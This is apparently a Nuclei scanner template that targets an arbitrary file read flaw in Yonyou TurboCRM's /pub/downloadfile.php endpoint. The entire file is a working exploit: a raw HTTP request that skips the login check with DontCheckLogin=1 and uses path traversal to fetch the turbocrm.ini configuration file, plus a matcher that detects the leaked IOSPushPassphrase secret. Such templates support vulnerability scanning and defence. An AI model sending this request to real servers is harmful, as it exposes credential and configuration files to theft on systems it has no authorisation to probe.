id: yonyou-turbo-crm-downloadfile-fileread

info:
  name: 用友 TurboCRM /pub/downloadfile.php 接口任意文件读取
  author: SleepingBag945
  severity: high

http:
  - raw:
      - |
        GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains(body,"IOSPushPassphrase")